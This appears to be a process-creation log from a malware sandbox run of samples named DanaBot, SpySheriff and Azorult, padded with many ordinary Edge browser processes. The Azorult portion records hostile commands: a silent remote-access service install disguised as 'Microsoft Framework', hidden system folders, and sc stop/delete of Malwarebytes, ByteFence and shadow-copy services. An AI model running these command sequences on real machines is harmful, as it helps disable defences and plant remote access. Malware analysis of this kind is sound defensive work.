"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4204,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3940,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6064,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6216,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6324,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6560,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6892,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6672,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4408,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=4448,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6880,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=6692,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7120,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6152 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=704 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=6500,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5428,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7408 /prefetch:8
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5768
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@1324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1324 -ip 1324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5768 -ip 5768
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 472
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 484
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Users\Admin\Downloads\DanaBot.exe
"C:\Users\Admin\Downloads\DanaBot.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7576,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4184 -ip 4184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5144 -ip 5144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 148
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7568,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=5140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7124,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7928 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7620,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:8
C:\Users\Admin\Downloads\SpySheriff.exe
"C:\Users\Admin\Downloads\SpySheriff.exe"
C:\Users\Admin\Downloads\SpySheriff.exe
"C:\Users\Admin\Downloads\SpySheriff.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7644,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5276,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=5556,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=7220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3008,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7052 /prefetch:8
C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
C:\programdata\install\ink.exe
C:\programdata\install\ink.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7968,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5652 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\SysWOW64\sc.exe
sc delete swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop AudioServer
C:\Windows\SysWOW64\sc.exe
sc stop AudioServer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AudioServer"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5292,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:1
C:\Windows\SysWOW64\sc.exe
sc delete AudioServer"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=2720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5452,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8052,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
C:\ProgramData\Windows\rfusclient.exe
